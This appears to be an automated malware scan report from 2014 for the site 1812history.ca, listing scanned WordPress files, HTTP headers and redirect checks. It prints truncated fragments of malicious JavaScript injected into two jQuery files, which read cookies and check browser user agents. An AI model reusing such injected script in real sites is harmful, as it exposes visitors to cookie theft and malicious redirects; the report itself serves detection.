Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=1812history.ca
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://1812history.ca/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 05:48:28 GMT Location: http://www.1812history.ca/home Server: Apache Content-Length: 302 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.1812history.ca/home | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 05:48:29 GMT Location: http://www.1812history.ca/home/ Server: Apache Content-Length: 307 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.1812history.ca/home/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 04 Oct 2014 05:48:30 GMT Pragma: no-cache Location: http://1812history.ca/home/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=1so7kojq6k9reqk9185s8ga4a6; path=/ X-Pingback: http://1812history.ca/home/xmlrpc.php | clean |
http://1812history.ca/home/ | 200 OK Content-Length: 26786 Content-Type: text/html | clean |
http://1812history.ca/home/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 94135 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t=void 0== jQuery.noConflict(); Antivirus reports:
| ||
http://1812history.ca/home/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8250 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t=void 0== Antivirus reports:
| ||
http://1812history.ca/home/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.3 | 200 OK Content-Length: 5339 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.3 | 200 OK Content-Length: 7538 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-includes/js/jquery/ui/jquery.ui.position.min.js?ver=1.10.3 | 200 OK Content-Length: 7323 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js?ver=1.10.3 | 200 OK Content-Length: 3891 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-includes/js/jquery/ui/jquery.ui.sortable.min.js?ver=1.10.3 | 200 OK Content-Length: 25228 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.10.3 | 200 OK Content-Length: 36856 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-includes/js/jquery/ui/jquery.ui.menu.min.js?ver=1.10.3 | 200 OK Content-Length: 10458 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-includes/js/jquery/ui/jquery.ui.autocomplete.min.js?ver=1.10.3 | 200 OK Content-Length: 8778 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-content/plugins/events-manager/includes/js/events-manager.js?ver=3.8.4 | 200 OK Content-Length: 64899 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 11313 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 27640 Content-Type: text/javascript | clean |
http://1812history.ca/home/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 2841 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 1812history.ca
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 05:48:28 GMT
Location: http://www.1812history.ca/home
Server: Apache
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
...302 bytes of data.
GET / HTTP/1.1
Host: 1812history.ca
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 05:48:28 GMT
Location: http://www.1812history.ca/home
Server: Apache
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
...302 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 1812history.ca
Referer: http://www.google.com/search?q=1812history.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 1812history.ca
Referer: http://www.google.com/search?q=1812history.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.